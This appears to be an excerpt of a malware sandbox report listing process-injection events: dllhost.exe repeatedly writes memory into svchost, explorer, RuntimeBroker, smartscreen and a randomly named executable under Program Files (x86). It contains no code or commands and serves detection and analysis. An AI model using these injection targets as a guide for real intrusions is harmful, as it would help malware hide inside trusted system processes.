Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1B927020000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1B927050000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
